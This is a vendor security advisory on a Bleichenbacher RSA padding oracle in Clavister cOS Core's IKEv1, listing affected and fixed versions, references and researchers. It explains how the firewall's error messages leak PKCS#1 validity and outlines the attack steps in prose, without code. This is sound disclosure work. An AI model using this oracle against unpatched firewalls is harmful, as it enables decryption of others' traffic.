Security Advisories
CLAV-SA-0157 Bleichenbacher Oracle Vulnerability in IKEv1
Back to list| Advisory ID | CLAV-SA-0157 |
| Summary | Bleichenbacher Oracle Vulnerability in IKEv1 |
| Updated | 2018-08-15 |
| First Published | 2018-08-15 |
| Impact | Medium |
| CVSS URL | https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:W/RC:C |
| CVSS Score | 5.9 |
| CVEs | |
| Affected Products |
|
Introduction
Clavister's implementation of IKEv1 contains’áan oracle for PKCS#1 validity. An Attacker can’ádetermine whether the plain-text with the nonce sent in the third message’áof the handshake was PKCS#1-valid by examining the error message’áreturned by the firewall.
Detailed Description
Clavister's IKEv1 implementation contains an oracle for PKCS#1 validity. You can determine whether the plain-text with the nonce sent in the third message’áof the handshake was PKCS#1-valid by examining the error message’áreturned by the firewall. If the error message contains the text "Data’álength too large for private key to decrypt", then the plain-text was’ávalid (despite the error). If the error message is only 8 bytes long,’áthen the plain-text was invalid.
The researchers implemented and tested an attack against cOS Core version 12.00.06. The attack efficiency has a random component that makes it hard to estimate how long it will take before an attacker can achieve successful decryption. The fastest attack the researchers performed in their test setup took 9400 requests to the firewall and 51’áminutes.
The attack works as follows:’á
- The attacker gets a single cipher-text (e.g. by eavesdropping it)’á
- The attacker creates new cipher-texts by modifying the original one’áexploiting some mathematical properties of RSA.’á
- The new cipher-texts are sent to the server observing its reaction.’á
- After doing this for thousands of cipher-texts, the attacker can’ádecrypt the original cipher-text without the key.
Due to the timeouts of IKE SAs, the missing configuration options, and’áthe Diffie-Hellman key exchange, it's not possible to attack the IKEv1 handshake’áwith RSA encrypted nonces directly.’áHowever, since the gateway certificate’áof the device may be reused for other’ápurposes, an attacker could e.g. attack the TLS protection of the configuration’áwebsite of the firewall.
For more details check the researchers blog post linked in the references section of this advisory.
Affected Versions
The following versions are affected by this vulnerability:
- All cOS Core’á12.00.xx versions before 12.00.09’á
- All cOS Core’á11.20.xx versions’ábefore 11.20.06
- All cOS Core’á11.00.xx versions’ábefore 11.00.11
- Any older versions of cOS Core with IKEv1 support
Fix Information
RSA authentication was permanently’ádisabled for IKEv1.
Security Patches
The vulnerability was fixed in the following versions:
- cOS Core’á12.00.09
- cOS Core’á11.20.06
- cOS Core’á11.00.11
Updated versions are available for download through My Clavister portal (Link)
References
- https://web-in-security.blogspot.com/2018/08/practical-bleichenbacher-attacks-on-ipsec-ike.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8753
Acknowledgements
Clavister thanks the following researchers for their responsible disclosure and continuous assistance during the vulnerability triage process:
- Dennis Felsch (Ruhr-University Bochum)
- Martin Grothe (Ruhr-University Bochum)
- JҠrg Schwenk (Ruhr-University Bochum)
- Adam Czubak (University of Opole)
- Marcin Szymanek (University of Opole)
Contact
- E-mail: <security@clavister.com>
- PGP: id 8813E86F, fingerprint A91407250F753C1D27263A7EBE9E30498813E86F
- WWW: Tickets can also be created through’áhttps://www.clavister.com/
’á